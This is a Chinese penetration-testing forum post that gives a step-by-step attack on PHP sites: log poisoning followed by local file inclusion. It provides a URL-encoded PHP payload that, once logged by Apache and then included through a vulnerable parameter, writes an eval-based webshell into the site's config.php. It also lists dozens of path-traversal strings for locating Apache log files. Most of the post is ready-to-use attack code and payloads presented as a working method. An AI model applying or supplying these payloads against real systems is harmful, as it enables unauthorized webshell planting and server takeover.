中国网络渗透测试联盟

标题: php包含apache日志写马 [打印本页]
作者: admin    时间: 2012-9-15 14:27
标题: php包含apache日志写马
因为上面那个很不实际,我在测试中发现日志动不动就是几十兆,那样玩起来也没意思了。下面想的再深入一点也就是我们写入一个很实际的webshell来用,也比上面那种慢的要死好很多。 ( r( Y* N( V8 r3 T6 f. _
! c+ ^$ `: H* p6 K/ c: Z
比如还是这句一句话木马 ( ]; M2 j# }# \0 _& h$ ]
<?eval($_POST[cmd]);?>   
# \1 j8 P2 _9 I$ s' w, @. n( f
5 ^& M% n! D$ }7 [到这里你也许就想到了,这是个很不错的办法。接着看,如何写入就成了个问题,用这句, 8 p+ G- b8 `* p# T9 ]  n4 T" v+ i
fopen打开/home/virtual/www.xxx.com/forum/config.php这个文件,然后写入<?eval($_POST[cmd]);?>这个一句话木马服务端语句。连起来表达成php语句就是
9 v5 c( N# l; S; ]2 {7 W5 J* G7 G9 e  m) U# e) u
<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?eval($_POST[cmd]);?>"); / U1 \. {! k, }9 O2 U
fclose($fp);?>   //在config.php里写入一句木马语句
, K+ }& l5 t* {5 D% S# v. u) F' o
我们提交这句,再让Apache记录到错误日志里,再包含就成功写入shell,记得一定要转换成URL格式才成功。
$ `) G9 S. m2 \6 |' r. j转换为 ; o+ ]# [7 D* n5 B  W
%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2F - J3 c; E% J5 }. S+ h
config%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp - K) i: v( s9 Y% \1 b6 }/ O0 Q
%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3B
' m+ g. B+ G1 l9 Pfclose%28%24fp%29%3B%3F%3E . l' A6 l! g. X  u- K
我们提交
$ C+ A2 E- r" Q% fhttp://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww
7 f5 X0 L1 C- H: R%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp . i- P5 Z1 n/ ]% R8 }, Q, d
%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5B ( Y. ^# [3 @" f: R% R( _
cmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E / ^) s; Y6 G8 f/ E+ S: n( i
2 a4 X( P! I8 r7 n* U, y! P
这样就错误日志里就记录下了这行写入webshell的代码。 ( e3 g0 @: R$ m8 F% @
我们再来包含日志,提交   J. I5 M$ p! i& i% }- V$ L
http://xxx.com/z.php?zizzy=/home ... /logs/www-error_log / B, D* S  d" c$ T$ y# ]  K

% [: ~' U2 _; _这样webshell就写入成功了,config.php里就写入一句木马语句
  D0 d5 O6 A, b. x8 `2 NOK. - K/ `9 V: X. b, i1 ]
http://www.xxx.com/forum/config.php这个就成了我们的webshell * j& k( [$ k1 @% Y! Z
直接用lanker的客户端一连,主机就是你的了。
5 F7 ~: A( X: e3 _% E# c! F8 @5 w
) {0 ~$ @& I; ?1 L3 w( cPS:上面讲的,前提是文件夹权限必须可写 ,一定要-rwxrwxrwx(777)才能继续,这里直接用上面列出的目录来查看。上面讲的都是在知道日志路径的情况下的利用
" L& M6 V% P% M$ Y' s; p9 M$ {( y" \& }8 M. w! O
其他的日志路径,你可以去猜,也可以参照这里。 7 e0 N, n; Q* z- F: v4 B. D
../../../../../../../../../../var/log/httpd/access_log ' w3 x4 g) Z/ ?; f3 Y
../../../../../../../../../../var/log/httpd/error_log 9 ?9 p# x5 v) F/ l
../apache/logs/error.log
* D4 O9 n7 @' z../apache/logs/access.log
1 y3 a' p# b& |../../apache/logs/error.log . r; X  t0 i- Z  h; V9 S- ]
../../apache/logs/access.log
9 l% Z* O+ b, u( f) X../../../apache/logs/error.log
, n* F9 \) {/ e3 V1 I../../../apache/logs/access.log 3 C; J: `# a4 Z( q; O
../../../../../../../../../../etc/httpd/logs/acces_log
! n8 b+ p4 q  N../../../../../../../../../../etc/httpd/logs/acces.log
+ ]$ H- N. i& s# @, s../../../../../../../../../../etc/httpd/logs/error_log
: P" F' f) p) f( ~4 Y2 N" p$ ^../../../../../../../../../../etc/httpd/logs/error.log
* r: P$ D! J: v7 O: Q../../../../../../../../../../var/www/logs/access_log
' e* b0 f0 [. |7 v# t1 y$ l../../../../../../../../../../var/www/logs/access.log 3 h. K! E  f% }2 A# `  `/ r
../../../../../../../../../../usr/local/apache/logs/access_log , V4 V; F1 g& b# k
../../../../../../../../../../usr/local/apache/logs/access.log 4 ^& T1 z" u# ~, Y% |% o
../../../../../../../../../../var/log/apache/access_log $ q# }) j$ T6 |* g" m2 d% X& W
../../../../../../../../../../var/log/apache/access.log
; t) i8 X5 |: {; W+ u: U( M../../../../../../../../../../var/log/access_log + e9 ]9 x4 a% b
../../../../../../../../../../var/www/logs/error_log . i. N( s) h1 H/ H; F1 _6 G
../../../../../../../../../../var/www/logs/error.log 9 [% m  |  j! t% r4 G
../../../../../../../../../../usr/local/apache/logs/error_log : [2 T2 F0 S; l0 x
../../../../../../../../../../usr/local/apache/logs/error.log
( q3 U# @% U- {7 W% I../../../../../../../../../../var/log/apache/error_log
: x* S! V/ b  g4 Y' ~9 s) u& Z../../../../../../../../../../var/log/apache/error.log
$ y; n+ {) w( J/ ^# d$ D../../../../../../../../../../var/log/access_log " t0 c- t( P+ \/ B4 Y
../../../../../../../../../../var/log/error_log
( P% q9 X/ ?& l% `/var/log/httpd/access_log       ) g; e* q, A; G- Y5 ?: }* v5 t5 b9 i
/var/log/httpd/error_log     
3 m" n0 m+ T9 U( h8 k../apache/logs/error.log     $ ]5 c) ^- K0 A  r6 E
../apache/logs/access.log
! ^9 P! D( s3 }. T- v+ m: t../../apache/logs/error.log
: T) G6 x. c! g7 N* G../../apache/logs/access.log
8 `8 y& \( W  ?+ b1 p0 ]../../../apache/logs/error.log
0 J$ o) U& C+ B3 P, Q* K& S../../../apache/logs/access.log
) A. B  m, n, S1 c/etc/httpd/logs/acces_log
2 ?1 e  H9 y1 E. b' G- Z/etc/httpd/logs/acces.log . s* f7 w& S  U
/etc/httpd/logs/error_log # u/ {7 M2 ]1 U* W
/etc/httpd/logs/error.log % @6 ~& N# H9 e0 h
/var/www/logs/access_log " h% B$ J2 Z4 M; R; g$ G( s
/var/www/logs/access.log
9 h' T) S. S, @; D" L! f: ?- r/ B/usr/local/apache/logs/access_log & c" Y4 |# W4 i9 i  u
/usr/local/apache/logs/access.log % m- L) ?8 {% Q  I/ [
/var/log/apache/access_log
" b" K+ ?, k% J; r: F0 ]1 E, l- I/var/log/apache/access.log
. t1 b5 \( r: U3 {/var/log/access_log ) Q5 P  ~& C( ^' o3 D! ~2 N. B- w2 D
/var/www/logs/error_log ( b! l: L% _( i( h
/var/www/logs/error.log ) Q% |8 h8 C4 |9 [" j
/usr/local/apache/logs/error_log
) A; q4 L8 l- D- W1 h' W: k# F+ F/usr/local/apache/logs/error.log 2 P" N8 _( p4 w; s5 ^
/var/log/apache/error_log
, @. N1 q2 ]* h( _5 F8 x1 p/var/log/apache/error.log
3 {4 y5 E2 i  a2 T$ |# M/var/log/access_log # ?8 O9 T7 z% {- H; s
/var/log/error_log



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2